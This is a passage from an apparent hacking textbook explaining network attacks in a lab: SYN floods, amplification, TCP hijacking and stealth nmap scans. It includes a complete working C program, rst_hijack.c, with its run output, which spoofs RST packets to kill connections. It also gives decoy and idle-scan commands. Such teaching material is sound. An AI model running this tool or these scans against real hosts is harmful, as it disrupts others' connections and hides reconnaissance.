SYN Flooding port 22 of 192.168.42.88..

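In the example above, the host 192.168.42.88 is a Windows XP machine running an openssh server on port 22 via cygwin. The tcpdump output below shows the spoofed SYN packets flooding the host from apparently random IP addresses. While the program is running, legitimate connections cannot be made to this port.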

reader@hacking:~/booksrc $ sudo tcpdump -i eth0 -nl -c 15 "host 192.168.42.88"
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 96 bytes
17:08:16.334498 IP 121.213.150.59.4584 > 192.168.42.88.22: S
751659999:751659999(0) win 14609
17:08:16.346907 IP 158.78.184.110.40565 > 192.168.42.88.22: S
139725579:139725579(0) win 64357
17:08:16.358491 IP 53.245.19.50.36638 > 192.168.42.88.22: S
322318966:322318966(0) win 43747
17:08:16.370492 IP 91.109.238.11.4814 > 192.168.42.88.22: S
685911671:685911671(0) win 62957
17:08:16.382492 IP 52.132.214.97.45099 > 192.168.42.88.22: S
71363071:71363071(0) win 30490
17:08:16.394909 IP 120.112.199.34.19452 > 192.168.42.88.22: S
1420507902:1420507902(0) win 53397
17:08:16.406491 IP 60.9.221.120.21573 > 192.168.42.88.22: S
2144342837:2144342837(0) win 10594
17:08:16.418494 IP 137.101.201.0.54665 > 192.168.42.88.22: S
1185734766:1185734766(0) win 57243
17:08:16.430497 IP 188.5.248.61.8409 > 192.168.42.88.22: S
1825734966:1825734966(0) win 43454
17:08:16.442911 IP 44.71.67.65.60484 > 192.168.42.88.22: S
1042470133:1042470133(0) win 7087
17:08:16.454489 IP 218.66.249.126.27982 > 192.168.42.88.22: S
1767717206:1767717206(0) win 50156
17:08:16.466493 IP 131.238.172.7.15390 > 192.168.42.88.22: S
2127701542:2127701542(0) win 23682
17:08:16.478497 IP 130.246.104.88.48221 > 192.168.42.88.22: S
2069757602:2069757602(0) win 4767
17:08:16.490908 IP 140.187.48.68.9179 > 192.168.42.88.22: S
1429854465:1429854465(0) win 2092
17:08:16.502498 IP 33.172.101.123.44358 > 192.168.42.88.22: S
1524034954:1524034954(0) win 26970
15 packets captured
30 packets received by filter
0 packets dropped by kernel
reader@hacking:~/booksrc $ ssh -v 192.168.42.88
OpenSSH_4.3p2, OpenSSL 0.9.8c 05 Sep 2006
debug1: Reading configuration data /etc/ssh/ssh_config
debug1: Connecting to 192.168.42.88 [192.168.42.88] port 22.
debug1: connect to address 192.168.42.88 port 22: Connection refused
ssh: connect to host 192.168.42.88 port 22: Connection refused
reader@hacking:~/booksrc $

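Some operating systems (for example, Linux) use a technique called syncookies to try to prevent SYN flood attacks. A TCP stack using syncookies sets the initial sequence number of the responding SYN/ACK packet to a value based on host details and time (to prevent replay attacks).

The TCP connections don't actually become active until the final ACK packet for the TCP handshake is checked. If the acknowledgment number in that ACK doesn't match the value that was sent, or the ACK never arrives, a connection is never created. This helps prevent spoofed connection attempts, since the ACK packet requires information that was sent to the source address of the initial SYN packet.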
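The idea can be sketched in a few lines of C. This is a toy model under stated assumptions, not how any particular kernel implements syncookies: the function names, the time_slot and secret inputs, and especially the toy_mix() function are hypothetical, and a real stack would use a keyed cryptographic hash. The point it illustrates is that the server stores nothing for the half-open connection; it recomputes the number it placed in the SYN/ACK and compares it with what the final ACK acknowledges.

```c
#include <stdint.h>

/* Toy mixing function standing in for the keyed cryptographic hash a real
 * TCP stack would use. Illustration only; it is NOT secure. */
static uint32_t toy_mix(uint32_t x) {
   x ^= x >> 16;
   x *= 0x45d9f3bU;
   x ^= x >> 16;
   return x;
}

/* Derive the number sent in the SYN/ACK from connection details, a coarse
 * time counter, and a server secret (all hypothetical inputs). */
uint32_t make_cookie(uint32_t src_ip, uint32_t dst_ip, uint16_t src_port,
                     uint16_t dst_port, uint32_t time_slot, uint32_t secret) {
   uint32_t h = toy_mix(src_ip ^ secret);

   h = toy_mix(h ^ dst_ip);
   h = toy_mix(h ^ (((uint32_t)src_port << 16) | dst_port));
   return toy_mix(h ^ time_slot);
}

/* The final ACK must acknowledge cookie + 1. Nothing was stored for the
 * half-open connection; the cookie is simply recomputed and compared. */
int ack_is_valid(uint32_t ack_number, uint32_t src_ip, uint32_t dst_ip,
                 uint16_t src_port, uint16_t dst_port,
                 uint32_t time_slot, uint32_t secret) {
   uint32_t expected = make_cookie(src_ip, dst_ip, src_port, dst_port,
                                   time_slot, secret) + 1;

   return ack_number == expected;
}
```

A host that spoofed its source address never sees the SYN/ACK, so it cannot produce an ACK that passes ack_is_valid() except by guessing.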

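Ping of Death

According to the specification for ICMP, ICMP echo messages can only have 2¹⁶, or 65,536, bytes of data in the data part of the packet. The data portion of ICMP packets is commonly overlooked, since the important information is in the header. Several operating systems crashed if they were sent ICMP echo messages that exceeded the size specified. An ICMP echo message of this gargantuan size became affectionately known as the Ping of Death. It was a very simple hack exploiting a vulnerability that existed because no one ever considered this possibility. It should be easy for you to write a program using libnet that can perform this attack; however, it won't be that useful in the real world. Modern systems are all patched against this vulnerability.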
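The text doesn't spell out how an oversized message can reach a target at all. The usual explanation, assumed here, is IP fragmentation: the total length field of an IP packet is 16 bits wide (at most 65,535), but the 13-bit fragment offset is counted in 8-byte units, so a final fragment can claim to end beyond that limit. The sketch below only does the arithmetic; the function names are hypothetical, and it ignores the IP header itself, which makes the real limit on the data slightly smaller still.

```c
#include <stdint.h>

#define IP_MAX_PACKET 65535u /* Largest value of the 16-bit total length field */

/* Byte position where a fragment's data ends after reassembly.
 * offset_units is the 13-bit fragment offset field, counted in 8-byte units. */
uint32_t fragment_end(uint16_t offset_units, uint16_t data_len) {
   return (uint32_t)(offset_units & 0x1fff) * 8u + data_len;
}

/* Returns 1 if reassembly would need more room than a legal packet has. */
int overflows_reassembly(uint16_t offset_units, uint16_t data_len) {
   return fragment_end(offset_units, data_len) > IP_MAX_PACKET;
}
```

With the largest offset, 8191 units (65,528 bytes), a fragment carrying just 8 bytes already ends at byte 65,536. A reassembly routine that sized its buffer for a legal packet and didn't check this would write past the end.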

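However, history tends to repeat itself. Even though oversized ICMP packets won't crash computers anymore, new technologies sometimes suffer from similar problems. The Bluetooth protocol, commonly used with phones, has a similar ping packet on the L2CAP layer, which is also used to measure the communication time on established links. Many implementations of Bluetooth suffer from the same oversized ping packet problem. Adam Laurie, Marcel Holtmann, and Martin Herfurt have dubbed this attack Bluesmack and have released source code by the same name that performs this attack.

Teardrop

Another crashing DoS attack that came about for the same reason was called teardrop. Teardrop exploited another weakness in several vendors' implementations of IP fragmentation reassembly. Usually, when a packet is fragmented, the offsets stored in the header will line up to reconstruct the original packet with no overlap. The teardrop attack sent packet fragments with overlapping offsets, which caused implementations that didn't check for this irregular condition to inevitably crash.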
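The missing check is simple to state. The following sketch shows one way a reassembly routine might reject overlapping fragments. The struct and function names are hypothetical and the model is deliberately simplified (fragments already sorted by offset, offsets in bytes); it is not taken from any vendor's stack.

```c
#include <stddef.h>

/* Hypothetical, simplified view of a received fragment. */
struct fragment {
   unsigned int offset; /* Where this fragment's data starts, in bytes */
   unsigned int length; /* How many bytes of data it carries */
};

/* Returns 1 if any fragment starts before the previous one ended.
 * Assumes the array is already sorted by offset. */
int has_overlap(const struct fragment *frags, size_t count) {
   size_t i;

   for (i = 1; i < count; i++) {
      unsigned int prev_end = frags[i - 1].offset + frags[i - 1].length;

      if (frags[i].offset < prev_end)
         return 1; /* Overlap: reject rather than trust the offsets. */
   }
   return 0;
}
```

A first fragment covering bytes 0 through 35 followed by one that starts at byte 24 is flagged, while fragments that line up end to end are not.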

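Although this specific attack doesn't work anymore, understanding the concept can reveal problems in other areas. Although not limited to a Denial of Service, a recent remote exploit in the OpenBSD kernel (which prides itself on security) had to do with fragmented IPv6 packets. IP version 6 uses more complicated headers and even a different IP address format than the IPv4 most people are familiar with. Often, the same mistakes made in the past are repeated by early implementations of new products.

Ping Flooding

Flooding DoS attacks don't necessarily try to crash a service or resource, but instead try to overload it so it can't respond. Similar attacks can tie up other resources, such as CPU cycles and system processes, but a flooding attack specifically tries to tie up a network resource.

The simplest form of flooding is just a ping flood. The goal is to use up the victim's bandwidth so that legitimate traffic can't get through. The attacker sends many large ping packets to the victim, which eat away at the bandwidth of the victim's network connection.

There's nothing really clever about this attack; it's just a battle of bandwidth. An attacker with greater bandwidth than a victim can send more data than the victim can receive and therefore deny other legitimate traffic from getting to the victim.

Amplification Attacks

There are actually some clever ways to perform a ping flood without using massive amounts of bandwidth. An amplification attack uses spoofing and broadcast addressing to amplify a single stream of packets by a hundredfold. First, a target amplification system must be found. This is a network that allows communication to the broadcast address and has a relatively high number of active hosts. Then the attacker sends large ICMP echo request packets to the broadcast address of the amplification network, with a spoofed source address of the victim's system. The amplifier will broadcast these packets to all the hosts on the amplification network, which will then send corresponding ICMP echo reply packets to the spoofed source address (that is, to the victim's machine).

This amplification of traffic allows the attacker to send a relatively small stream of ICMP echo request packets out, while the victim gets swamped with up to a couple hundred times as many ICMP echo reply packets. This attack can be done with both ICMP packets and UDP echo packets. These techniques are known as smurf and fraggle attacks, respectively.

Figure 0x400-9.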

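Distributed DoS Flooding

A distributed DoS (DDoS) attack is a distributed version of a flooding DoS attack. Since bandwidth consumption is the goal of a flooding DoS attack, the more bandwidth the attacker is able to work with, the more damage they can do. In a DDoS attack, the attacker first compromises a number of other hosts and installs daemons on them. Systems installed with such software are commonly referred to as bots and make up what is known as a botnet. These bots wait patiently until the attacker picks a victim and decides to attack. The attacker uses some sort of controlling program, and all of the bots simultaneously attack the victim with some form of flooding DoS attack. Not only does the great number of distributed hosts multiply the effect of the flooding, it also makes tracing the attack source much more difficult.

TCP/IP Hijacking

TCP/IP hijacking is a clever technique that uses spoofed packets to take over a connection between a victim and a host machine. This technique is exceptionally useful when the victim uses a one-time password to connect to the host machine. A one-time password can be used to authenticate once and only once, which means that sniffing the authentication is useless for the attacker.

To carry out a TCP/IP hijacking attack, the attacker must be on the same network as the victim. By sniffing the local network segment, all of the details of open TCP connections can be pulled from the headers. As we have seen, each TCP packet contains a sequence number in its header. This sequence number advances as data is sent, so that packets can be put in the correct order on receipt. While sniffing, the attacker has access to the sequence numbers for a connection between a victim (system A in the following illustration) and a host machine (system B). Then the attacker sends a spoofed packet from the victim's IP address to the host machine, using the sniffed sequence number to provide the proper acknowledgment number, as shown here.

Figure 0x400-10.

The host machine will receive the spoofed packet with the correct acknowledgment number and will have no reason to believe it didn't come from the victim machine.

RST Hijacking

A very simple form of TCP/IP hijacking involves injecting an authentic-looking reset (RST) packet. If the source is spoofed and the acknowledgment number is correct, the receiving side will believe that the source actually sent the reset packet, and the connection will be reset.

Imagine a program to perform this attack on a target IP. At a high level, it would sniff using libpcap, then inject RST packets using libnet. Such a program doesn't need to look at every packet, only at established TCP connections to the target IP. Many other programs that use libpcap also don't need to look at every single packet, so libpcap provides a way to tell the kernel to only send certain packets that match a filter. This filter, known as a Berkeley Packet Filter (BPF), is very similar to a program. For example, the filter rule to filter for a destination IP of 192.168.42.88 is "dst host 192.168.42.88". Like a program, this rule consists of keywords and must be compiled before it's actually sent to the kernel. The tcpdump program uses BPFs to filter what it captures; it also provides a mode to dump the filter program.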

reader@hacking:~/booksrc $ sudo tcpdump -d "dst host 192.168.42.88"
(000) ldh      [12]
(001) jeq      #0x800          jt 2    jf 4
(002) ld       [30]
(003) jeq      #0xc0a82a58     jt 8    jf 9
(004) jeq      #0x806          jt 6    jf 5
(005) jeq      #0x8035         jt 6    jf 9
(006) ld       [38]
(007) jeq      #0xc0a82a58     jt 8    jf 9
(008) ret      #96
(009) ret      #0
reader@hacking:~/booksrc $ sudo tcpdump -ddd "dst host 192.168.42.88"
10
40 0 0 12
21 0 2 2048
32 0 0 30
21 4 5 3232246360
21 1 0 2054
21 0 3 32821
32 0 0 38
21 0 1 3232246360
6 0 0 96
6 0 0 0 
reader@hacking:~/booksrc $

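After the filter rule is compiled, it can be passed to the kernel for filtering. Filtering for established connections is a bit more complicated. All established connections will have the ACK flag set, so this is what we should look for. The TCP flags are found in the octet at offset 13 of the TCP header (counting from zero, which is how tcp[13] indexes it). The flags are found in the following order, from left to right: URG, ACK, PSH, RST, SYN, and FIN. This means that if the ACK flag is turned on, this octet would be 00010000 in binary, which is 16 in decimal. If both SYN and ACK are turned on, it would be 00010010 in binary, which is 18 in decimal.

In order to create a filter that matches when the ACK flag is turned on without caring about any of the other bits, the bitwise AND operator is used. ANDing 00010010 with 00010000 will produce 00010000, since the ACK bit is the only bit where both bits are 1. This means that a filter of tcp[13] & 16 == 16 will match the packets where the ACK flag is turned on, regardless of the state of the remaining flags.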
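The same masking can be tried directly in C. This is only a sketch of the arithmetic described above; the macro and function names are made up for the example and are not libpcap or libnet identifiers.

```c
#include <stdint.h>

#define TCP_FLAG_SYN 0x02 /* 00000010 */
#define TCP_FLAG_ACK 0x10 /* 00010000, decimal 16 */

/* Returns 1 if the ACK bit is on, whatever the other flag bits are. */
int ack_is_set(uint8_t flags) {
   return (flags & TCP_FLAG_ACK) == TCP_FLAG_ACK;
}
```

A flags octet of 18 (SYN and ACK) or 16 (ACK only) passes the test, while 2 (SYN only) does not.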

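This filter rule can be rewritten using named values and inverted logic as tcp[tcpflags] & tcp-ack != 0. This is easier to read but still provides the same result. This rule can be combined with the previous destination IP rule using and logic; the full rule is shown below.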

reader@hacking:~/booksrc $ sudo tcpdump -nl "tcp[tcpflags] & tcp-ack != 0 and dst host 192.168.42.88"
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 96 bytes
10:19:47.567378 IP 192.168.42.72.40238 > 192.168.42.88.22: . ack 2777534975 win 92 <nop,nop,timestamp 85838571 0>
10:19:47.770276 IP 192.168.42.72.40238 > 192.168.42.88.22: . ack 22 win 92 <nop,nop,timestamp 85838621 29399>
10:19:47.770322 IP 192.168.42.72.40238 > 192.168.42.88.22: P 0:20(20) ack 22 win 92 <nop,nop,timestamp 85838621 29399>
10:19:47.771536 IP 192.168.42.72.40238 > 192.168.42.88.22: P 20:732(712) ack 766 win 115 <nop,nop,timestamp 85838622 29399>
10:19:47.918866 IP 192.168.42.72.40238 > 192.168.42.88.22: P 732:756(24) ack 766 win 115 <nop,nop,timestamp 85838659 29402>

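In the following program, a similar rule is used to filter the packets libpcap sniffs. When the program gets a packet, the header information is used to spoof a RST packet. This program will be explained as it's listed.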

rst_hijack.c

#include <libnet.h>
#include <pcap.h>
#include "hacking.h"

void caught_packet(u_char *, const struct pcap_pkthdr *, const u_char *);
int set_packet_filter(pcap_t *, struct in_addr *);

struct data_pass {
   int libnet_handle;
   u_char *packet;
}; 

int main(int argc, char *argv[]) {
   struct pcap_pkthdr cap_header;
   const u_char *packet, *pkt_data;
   pcap_t *pcap_handle;
   char errbuf[PCAP_ERRBUF_SIZE]; // Same size as LIBNET_ERRBUF_SIZE
   char *device;
   u_long target_ip;
   int network;
   struct data_pass critical_libnet_data;

   if(argc < 2) { // argv[1] (the target IP) is required.
      printf("Usage: %s <target IP>\n", argv[0]);
      exit(0);
   }
   target_ip = libnet_name_resolve(argv[1], LIBNET_RESOLVE);

   if (target_ip == -1)
      fatal("Invalid target address");

   device = pcap_lookupdev(errbuf);
   if(device == NULL)
      fatal(errbuf);

   pcap_handle = pcap_open_live(device, 128, 1, 0, errbuf);
   if(pcap_handle == NULL)
      fatal(errbuf);

   critical_libnet_data.libnet_handle = libnet_open_raw_sock(IPPROTO_RAW);
   if(critical_libnet_data.libnet_handle == -1)
      libnet_error(LIBNET_ERR_FATAL, "can't open network interface.  -- this program must run as root.\n");

   libnet_init_packet(LIBNET_IP_H + LIBNET_TCP_H, &(critical_libnet_data.packet));
   if (critical_libnet_data.packet == NULL)
      libnet_error(LIBNET_ERR_FATAL, "can't initialize packet memory.\n");

   libnet_seed_prand();

   set_packet_filter(pcap_handle, (struct in_addr *)&target_ip);

   printf("Resetting all TCP connections to %s on %s\n", argv[1], device);
   pcap_loop(pcap_handle, -1, caught_packet, (u_char *)&critical_libnet_data);

   pcap_close(pcap_handle); 
}

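The majority of this program should make sense to you. In the beginning, a data_pass structure is defined, which is used to pass data through the libpcap callback. libnet is used to open a raw socket interface and to allocate packet memory. The file descriptor for the raw socket and a pointer to the packet memory will be needed in the callback function, so this critical libnet data is stored in its own structure. The final argument to the pcap_loop() call is the user pointer, which is passed directly to the callback function. By passing a pointer to the critical_libnet_data structure, the callback function will have access to everything in this structure. Also, the snap length value used in pcap_open_live() has been reduced from 4096 to 128, since the information needed from the packet is just in the headers.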

/* Sets a packet filter to look for established TCP connections to target_ip */
int set_packet_filter(pcap_t *pcap_hdl, struct in_addr *target_ip) {
   struct bpf_program filter;
   char filter_string[100];

   sprintf(filter_string, "tcp[tcpflags] & tcp-ack != 0 and dst host %s", inet_ntoa(*target_ip));

   printf("DEBUG: filter string is \'%s\'\n", filter_string);
   if(pcap_compile(pcap_hdl, &filter, filter_string, 0, 0) == -1)
      fatal("pcap_compile failed");

   if(pcap_setfilter(pcap_hdl, &filter) == -1)
      fatal("pcap_setfilter failed");

   return 0; // The function is declared int, so return a value.
}

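The set_packet_filter() function compiles and sets the BPF to only accept packets from established connections to the target IP. The sprintf() function is just a printf() that prints to a string.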

void caught_packet(u_char *user_args, const struct pcap_pkthdr *cap_header, const u_char *packet) {
   u_char *pkt_data;
   struct libnet_ip_hdr *IPhdr;
   struct libnet_tcp_hdr *TCPhdr;
   struct data_pass *passed;
   int bcount;

   passed = (struct data_pass *) user_args; // Pass data using a pointer to a struct.

   IPhdr = (struct libnet_ip_hdr *) (packet + LIBNET_ETH_H);
   // The TCP header follows the IP header (assumes no IP options).
   TCPhdr = (struct libnet_tcp_hdr *) (packet + LIBNET_ETH_H + LIBNET_IP_H);

   printf("resetting TCP connection from %s:%d ",
         inet_ntoa(IPhdr->ip_src), ntohs(TCPhdr->th_sport));
   printf("<---> %s:%d\n",
         inet_ntoa(IPhdr->ip_dst), ntohs(TCPhdr->th_dport));
   libnet_build_ip(LIBNET_TCP_H,      // Size of the packet sans IP header
      IPTOS_LOWDELAY,                 // IP tos
      libnet_get_prand(LIBNET_PRu16), // IP ID (randomized)
      0,                              // Frag stuff
      libnet_get_prand(LIBNET_PR8),   // TTL (randomized)
      IPPROTO_TCP,                    // Transport protocol
      *((u_long *)&(IPhdr->ip_dst)),  // Source IP (pretend we are dst)
      *((u_long *)&(IPhdr->ip_src)),  // Destination IP (send back to src)
      NULL,                           // Payload (none)
      0,                              // Payload length
      passed->packet);                // Packet header memory 

   libnet_build_tcp(ntohs(TCPhdr->th_dport), // Source TCP port (pretend we are dst)
      ntohs(TCPhdr->th_sport),        // Destination TCP port (send back to src)
      ntohl(TCPhdr->th_ack),          // Sequence number (use previous ack)
      libnet_get_prand(LIBNET_PRu32), // Acknowledgement number (randomized)
      TH_RST,                         // Control flags (RST flag set only)
      libnet_get_prand(LIBNET_PRu16), // Window size (randomized)
      0,                              // Urgent pointer
      NULL,                           // Payload (none)
      0,                              // Payload length
      (passed->packet) + LIBNET_IP_H);// Packet header memory

   if (libnet_do_checksum(passed->packet, IPPROTO_TCP, LIBNET_TCP_H) == -1)
      libnet_error(LIBNET_ERR_FATAL, "can't compute checksum\n");

   bcount = libnet_write_ip(passed->libnet_handle, passed->packet, LIBNET_IP_H+LIBNET_TCP_H);
   if (bcount < LIBNET_IP_H + LIBNET_TCP_H)
      libnet_error(LIBNET_ERR_WARNING, "Warning: Incomplete packet written.");

   usleep(5000); // pause slightly
}

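The callback function spoofs the RST packets. First, the critical libnet data is retrieved, and pointers to the IP and TCP headers are set using the structures included with libnet. We could use our own structures from hacking-network.h, but the libnet structures are already there and compensate for the host's byte ordering. The spoofed RST packet uses the sniffed source address as the destination, and vice versa. The sniffed acknowledgment number is used as the spoofed packet's sequence number, since that is what the receiving side expects.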

reader@hacking:~/booksrc $ gcc $(libnet-config --defines) -o rst_hijack rst_hijack.c -lnet -lpcap

reader@hacking:~/booksrc $ sudo ./rst_hijack 192.168.42.88
DEBUG: filter string is 'tcp[tcpflags] & tcp-ack != 0 and dst host 192.168.42.88'
Resetting all TCP connections to 192.168.42.88 on eth0
resetting TCP connection from 192.168.42.72:47783 <---> 192.168.42.88:22

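Continued Hijacking

The spoofed packet doesn't need to be an RST packet. This attack becomes more interesting when the spoofed packet contains data. The host machine receives the spoofed packet, increments the sequence number, and responds to the victim's IP. Since the victim's machine doesn't know about the spoofed packet, the host machine's response has an incorrect sequence number, so the victim ignores that response packet. And since the victim's machine ignored the host machine's response packet, the victim's sequence number count is off. Therefore, any packet the victim tries to send to the host machine will have an incorrect sequence number as well, causing the host machine to ignore it. In this case, both legitimate sides of the connection have incorrect sequence numbers, resulting in a desynchronized state. And since the attacker sent out the first spoofed packet that caused all this chaos, it can keep track of sequence numbers and continue spoofing packets from the victim's IP address to the host machine. This lets the attacker continue communicating with the host machine while the victim's connection hangs.

Port Scanning

Port scanning is a way of figuring out which ports are listening and accepting connections. Since most services run on standard, documented ports, this information can be used to determine which services are running. The simplest form of port scanning involves trying to open TCP connections to every possible port on the target system. While this is effective, it's also noisy and detectable. Also, when connections are established, services will normally log the IP address. To avoid this, several clever techniques have been invented.

A port scanning tool called nmap, written by Fyodor, implements all of the following port-scanning techniques. This tool has become one of the most popular open source port-scanning tools.

Stealth SYN Scan

A SYN scan is also sometimes called a half-open scan. This is because it doesn't actually open a full TCP connection. Recall the TCP/IP handshake: when a full connection is made, first a SYN packet is sent, then a SYN/ACK packet is sent back, and finally an ACK packet is returned to complete the handshake and open the connection. A SYN scan doesn't complete the handshake, so a full connection is never opened. Instead, only the initial SYN packet is sent, and the response is examined. If a SYN/ACK packet is received in response, that port must be accepting connections. This is recorded, and an RST packet is sent to tear down the connection to prevent the service from accidentally being DoSed.

Using nmap, a SYN scan can be performed using the command-line option -sS. The program must be run as root, since the program isn't using standard sockets and needs raw network access.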

reader@hacking:~/booksrc $ sudo nmap -sS 192.168.42.72

Starting Nmap 4.20 ( http://insecure.org ) at 2007-05-29 09:19 PDT
Interesting ports on 192.168.42.72:
Not shown: 1696 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh 

Nmap finished: 1 IP address (1 host up) scanned in 0.094 seconds

FIN, X-mas, and Null Scans

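In response to SYN scanning, new tools to detect and log half-open connections were created. So yet another collection of techniques for stealth port scanning evolved: FIN, X-mas, and Null scans. These all involve sending a nonsensical packet to every port on the target system. If a port is listening, these packets just get ignored. However, if the port is closed and the implementation follows protocol (RFC 793), an RST packet will be sent. This difference can be used to detect which ports are accepting connections, without actually opening any connections.

The FIN scan sends a FIN packet, the X-mas scan sends a packet with FIN, URG, and PUSH turned on (so named because the flags are lit up like a Christmas tree), and the Null scan sends a packet with no TCP flags set. While these types of scans are stealthier, they can also be unreliable. For instance, Microsoft's implementation of TCP doesn't send RST packets like it should, making this form of scanning ineffective.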
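As a rough sketch of what distinguishes the three probes, the function below returns the TCP flags octet each scan type would put in its packet, using the standard bit values for the flags. The enum and function names are hypothetical and this is not nmap's code; it only encodes the description above.

```c
#include <stdint.h>

/* Standard bit positions of the TCP flags used by these scans. */
#define SCAN_FLAG_FIN 0x01
#define SCAN_FLAG_PSH 0x08
#define SCAN_FLAG_URG 0x20

enum scan_type { SCAN_FIN, SCAN_XMAS, SCAN_NULL };

/* Returns the flags octet for the probe packet of each scan type. */
uint8_t probe_flags(enum scan_type type) {
   switch (type) {
      case SCAN_FIN:
         return SCAN_FLAG_FIN;
      case SCAN_XMAS:
         return SCAN_FLAG_FIN | SCAN_FLAG_PSH | SCAN_FLAG_URG;
      default:
         return 0; /* Null scan: no flags at all */
   }
}

/* On a stack that follows RFC 793, a closed port answers with RST and a
 * listening port stays silent, so "no RST" is read as open or filtered. */
int port_may_be_open(int received_rst) {
   return !received_rst;
}
```

Because silence can also mean a firewall dropped the probe, the result for a quiet port is only "open or filtered", which matches the open|filtered state that nmap reports for these scans.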

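Using nmap, FIN, X-mas, and NULL scans can be performed using the command-line options -sF, -sX, and -sN, respectively. Their output looks basically the same as the previous scan.

Spoofing Decoys

Another way to avoid detection is to hide among several decoys. This technique simply spoofs connections from various decoy IP addresses in between each real port-scanning connection. The responses from the spoofed connections aren't needed, since they are simply misleads. However, the spoofed decoy addresses must use real IP addresses of live hosts; otherwise, the target may be accidentally SYN flooded.

Decoys can be specified in nmap with the -D command-line option. The sample nmap command shown below scans the IP 192.168.42.72, using 192.168.42.10 and 192.168.42.11 as decoys.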

reader@hacking:~/booksrc $ sudo nmap -D 192.168.42.10,192.168.42.11 192.168.42.72

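Idle Scanning

Idle scanning is a way to scan a target using spoofed packets from an idle host, by observing changes in the idle host. The attacker needs to find a usable idle host that is not sending or receiving any other network traffic and that has a TCP implementation that produces predictable IP IDs that change by a known increment with each packet. IP IDs are meant to be unique per packet per session, and they are commonly incremented by a fixed amount. Predictable IP IDs have never really been considered a security risk, and idle scanning takes advantage of this misconception. Newer operating systems, such as the recent Linux kernel, OpenBSD, and Windows Vista, randomize the IP ID, but older operating systems and hardware (such as printers) typically do not.

First, the attacker gets the current IP ID of the idle host by contacting it with a SYN packet or an unsolicited SYN/ACK packet and observing the IP ID of the response. By repeating this process a few more times, the increment applied to the IP ID with each packet can be determined.

Then, the attacker sends a spoofed SYN packet with the idle host's IP address to a port on the target machine. One of two things will happen, depending on whether that port on the victim machine is listening:

If that port is listening, a SYN/ACK packet will be sent back to the idle host. But since the idle host didn't actually send out the initial SYN packet, this response appears to be unsolicited to the idle host, and it responds by sending back an RST packet.
If that port isn't listening, the target machine doesn't send a SYN/ACK packet back to the idle host, so the idle host doesn't respond.

At this point, the attacker contacts the idle host again to determine how much the IP ID has incremented. If it has only incremented by one interval, no other packets were sent out by the idle host between the two checks. This implies that the port on the target machine is closed. If the IP ID has incremented by two intervals, one packet, presumably an RST packet, was sent out by the idle host between the checks. This implies that the port on the target machine is open.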
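The inference in the last step is just a comparison of two IP ID readings. Here is a minimal sketch of that decision, assuming a single spoofed SYN per port and a truly idle host; the enum and function names are hypothetical and are not taken from nmap.

```c
#include <stdint.h>

enum port_state { PORT_CLOSED, PORT_OPEN, PORT_UNKNOWN };

/* ipid_before and ipid_after are the IP IDs seen in the idle host's replies
 * to the attacker's two probes; step is the per-packet increment measured
 * earlier. The IP ID is a 16-bit field, so the subtraction wraps at 65536. */
enum port_state classify_port(uint16_t ipid_before, uint16_t ipid_after,
                              uint16_t step) {
   uint16_t delta;

   if (step == 0)
      return PORT_UNKNOWN; /* The IP ID isn't predictable on this host. */

   delta = (uint16_t)(ipid_after - ipid_before);

   if (delta == step)
      return PORT_CLOSED;  /* Only the reply to the second probe was sent. */
   if (delta == (uint16_t)(2 * step))
      return PORT_OPEN;    /* One extra packet, presumably the RST. */
   return PORT_UNKNOWN;    /* Other traffic skewed the count. */
}
```

Readings of 1000 and then 1002 with a step of 1 point to an open port; 1000 and then 1001 point to a closed one.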

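The steps are illustrated in the accompanying figure for both possible outcomes.

Of course, if the idle host isn't truly idle, the results will be skewed. If there is light traffic on the idle host, multiple packets can be sent for each port. If 20 packets are sent, then a change of 20 incremental steps should be an indication of an open port, and no change, of a closed port. Even if there is light traffic, such as one or two packets unrelated to the scan sent by the idle host, this difference is large enough that it can still be detected.

If this technique is used properly on an idle host that doesn't have any logging capabilities, the attacker can scan any target without ever revealing his or her IP address.

After finding a suitable idle host, this type of scanning can be done with nmap using the -sI command-line option followed by the idle host's address: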

reader@hacking:~/booksrc $ sudo nmap -sI idlehost.com 192.168.42.7

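Figure 0x400-11.

Proactive Defense (shroud)

Port scans are often used to profile systems before they are attacked. Knowing what ports are open allows an attacker to determine which services can be attacked. Many intrusion detection systems (IDSs) offer methods to detect port scans, but by then the information has already been leaked. While writing this chapter, I wondered if it is possible to prevent port scans before they actually happen. Hacking, really, is all about coming up with new ideas, so a newly developed method for proactive port-scanning defense will be presented here.

First of all, the FIN, Null, and X-mas scans can be prevented by a simple kernel modification. If the kernel never sends reset packets, these scans will turn up nothing. The following output uses grep to find the kernel code responsible for sending reset packets.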

reader@hacking:~/booksrc $ grep -n -A 20 "void.*send_reset" /usr/src/linux/net/ipv4/tcp_ipv4.c
547:static void tcp_v4_send_reset(struct sock *sk, struct sk_buff *skb)
548-{
549-    struct tcphdr *th = skb->h.th;
550-    struct {
551-            struct tcphdr th;
552-#ifdef CONFIG_TCP_MD5SIG
553-            __be32 opt[(TCPOLEN_MD5SIG_ALIGNED >> 2)];
554-#endif
555-    } rep;
556-    struct ip_reply_arg arg;
557-#ifdef CONFIG_TCP_MD5SIG
558-    struct tcp_md5sig_key *key;
559-#endif
560-

     return; // Modification: Never send RST, always return.

561-    /* Never send a reset in response to a reset. */
562-    if (th->rst)
563-            return;
564-
565-    if (((struct rtable *)skb->dst)->rt_type != RTN_LOCAL)
566-            return;
567- 
reader@hacking:~/booksrc $

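By adding the return command (the unnumbered line inserted above), the tcp_v4_send_reset() kernel function will simply return instead of doing anything. After the kernel is recompiled, the resulting kernel won't send out reset packets, avoiding information leakage.

FIN Scan Before the Kernel Modification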

matrix@euclid:~ $ sudo nmap -T5 -sF 192.168.42.72
Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2007-03-17 16:58 PDT
Interesting ports on 192.168.42.72:
Not shown: 1678 closed ports

PORT   STATE         SERVICE
22/tcp open|filtered ssh
80/tcp open|filtered http
MAC Address: 00:01:6C:EB:1D:50 (Foxconn)
Nmap finished: 1 IP address (1 host up) scanned in 1.462 seconds
matrix@euclid:~ $

FIN Scan After the Kernel Modification

matrix@euclid:~ $ sudo nmap -T5 -sF 192.168.42.72
Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2007-03-17 16:58 PDT
Interesting ports on 192.168.42.72:
Not shown: 1678 closed ports
PORT   STATE         SERVICE
MAC Address: 00:01:6C:EB:1D:50 (Foxconn)
Nmap finished: 1 IP address (1 host up) scanned in 1.462 seconds
matrix@euclid:~ $

